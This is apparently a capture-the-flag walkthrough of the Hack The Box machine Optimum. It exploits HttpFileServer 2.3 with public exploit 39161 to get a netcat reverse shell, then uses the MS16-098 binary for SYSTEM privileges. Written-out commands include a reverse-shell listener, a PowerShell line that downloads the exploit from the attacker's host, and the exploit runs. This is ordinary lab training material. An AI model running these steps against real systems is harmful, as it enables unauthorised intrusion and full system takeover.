This is a walkthrough of the Optimum box from Hack The Box, done without using Metasploit.
1. Initial Scans
sudo nmap -sC -sV -O -p- -oA initial_scan2 10.10.10.8
- Optimum box IP address is 10.10.10.8
- -sC = run default nmap scripts
- -sV = detect service version
- -O = detect OS
- -p- = Port scan all ports
- -A = Enables OS detection, version detection, script scanning, and traceroute
- -oA = Output to a file I called “initial_scan”
- Note: In the previous boxes I did -A (enables OS detection, version detection, script scanning and traceroute). However, I found that it still did not pick up as much as doing -sC, -sV and -O individually. So for this scan I changed it up and I got more results.
Port 80 is open and running HttpFileServer httpd 2.3. I also ran a UDP scan to cover all my bases. Using the -sU flag enables you to scan for UDP ports. This took a very long time to complete (in fact, I finished the box before this scan even completed). Everything looks to be filtered on UDP. We don’t get any additional info or possible points of entry from this scan.
sudo nmap -sU -O -p- -oA udp_scan 10.10.10.8
2. Enumeration
Since we know 10.10.10.8 has an http server on port 80, let’s see what that looks like in a web browser:
It looks like some sort of file keeping/sharing application. Sort of like Dropbox. My first thoughts are: either uploading something to the server, or seeing if there is a default credential available to log in (since there is a login at the top of the page). I feel like a default login would be too easy, so I’ll go ahead and google httpfileserver 2.3 exploits to see what comes up:
The first result that pops up for me looks like some sort of exploit for remote command execution, so I click on it to get some more info:
This exploit is great because it provides a clear description of what the exploit does, and also provides instructions on how to run the script (see “usage” and “edb note” near the bottom of the screenshot above).
Scroll down a bit more and you can see a place for a “local IP address” and a “local port number”. Then at the bottom of the page in green it says “don’t forget to change the local IP and port number”. So we know we will need to adjust that on this script after we download it. I also googled a bit more and found out that the exploit is basically creating a script that will download netcat from our machine to the victim machine and save it to C:\Users\Public\. Then it will run netcat, which will create a reverse shell back to the attacker machine.
So to move forward, we now know we need to do the following:
- set up a web server (on our attacking machine) that hosts netcat over port 80
- edit the script with our own local (attacker) IP and local (attacker) port number
- start a netcat listener on our attacking machine for the reverse shell to connect back to us
- run the exploit using the instructions provided
3. Gaining an initial foothold
Step 1: Set up a web server that hosts netcat over port 80. So let’s find where we have the netcat executable on our box:
Now copy that executable to the location where your web server is going to be set up. I will be running my web server from the optimum directory so I’ll put the executable there:
cp /usr/share/windows-resources/binaries/nc.exe ~/home/churr0s/Documents/HTB/optimum
And now to start the file server. Kali has a python http server script built in. To run it, open up a new terminal window and type:
python -m SimpleHTTPServer
Step 2: Download the exploit and edit the file with our own local IP and port number. Using the EDB-ID from the Exploit page, I can search on my own machine using searchsploit:
searchsploit 30161
I found the exploit on my local exploit database and now to copy it to my current directory, I just add an -m flag:
searchsploit -m 39161
Now just open up the script using your favorite text editor (like VIM) and change the local IP to your attacker IP, and the port to be whatever port you’re going to set up your netcat listener on. I chose port 4444.
Step 3: Start a netcat listener on our machine. I did this in the same directory I downloaded my exploit to (in a new terminal window), and used port 4444:
nc -nlvp 4444
Step 4: Run the exploit:
python 39161.py 10.10.10.8 80
You can see on your file server window that there is a get request coming in for the netcat executable:
Then if you look on your netcat listener window, you can see it received the reverse shell:
Run a whoami to see what user you are currently running as. You can see you’re running as kostas, and you’re currently in that user’s desktop. So run “dir” to see what’s on the Desktop. You can see a user.txt.txt flag so grab it by running “type user.txt.txt”
Kostas is not an admin, so we will need to do some privilege escalation to get the root flag.
4. Privilege Escalation
There is a great script called the “Windows Exploit Suggester” that can help identify possible exploits on a Windows box by checking for missing patches. Definitely bookmark this script as it will come in handy for Windows privilege escalation down the road. To download the script open a new terminal window and type:
git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
The readme document on the github page mentions that you need to install dependencies as well:
pip install xlrd --upgrade
And that you need to update the database. This will create an .xls spreadsheet from the Microsoft vulnerability database and save it to your current working directory. You will need this in a few minutes to run the script.
Next on your reverse shell, in your victim machine’s prompt run a “systeminfo” to get all of the info about that box. Copy and paste that entire output into a text file which you can name “sysinfo.txt” and save it in the same directory you saved your windows exploit suggester script and the .xls spreadsheet. Now run the following command to see what exploits come up:
./windows-exploit-suggester.py --database 2020-09-06-mssb.xls --systeminfo sysinfo.txt
- 2020-09-06-mssb.xls is the spreadsheet that was created when you updated the database
- sysinfo.txt is the text file you created that contains the “systeminfo” output from the victim box
Anything that has a green E or M next to it is an exploit, and M’s mean Metasploit, so let’s focus on the E’s. MS16-135 talks about DoS so I skip down to MS16-098 and then visit the exploit-db link provided to check it out. It provides a link for the binary (the 41020.exe mentioned at the top of the description) so we can just download it using the link they provided. I downloaded it to the same directory I’m running everything else in:
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
Do a chmod to make the file executable
chmod +x 41020.exe
Now because this is a privilege escalation script, we want to get it onto the victim box and be able to run it. You’ll need to set up another web server to “host” the script. Then from the victim box you can reach out and grab that script from the web server and download it. Just make sure you download it to a directory that you have write (downloadable) access to, like c:\Users\Public\Downloads\
Open a new terminal window and start a new file server (I chose port 9005):
python -m SimpleHTTPServer 9005
Then on your victim box, run this powershell command which allows you to reach out to the file server and download a file to a directory of your choosing. Tip: keep this powershell script in your back pocket for future engagements:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.12:9005/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"
- 10.10.14.12 is my IP and 9005 is the port I set up the web server to operate over
If you look on the terminal window running your file server, you should see a get request coming in for that executable!
Now you should see 41020.exe in your Downloads directory on the victim machine. If it’s there, now’s the time to execute it and hopefully escalate privileges to root! Type “41020.exe” to execute. Then run a “whoami” to see if you are now root:
We are now authority\system (root) so the exploit worked! Now grab the root flag:
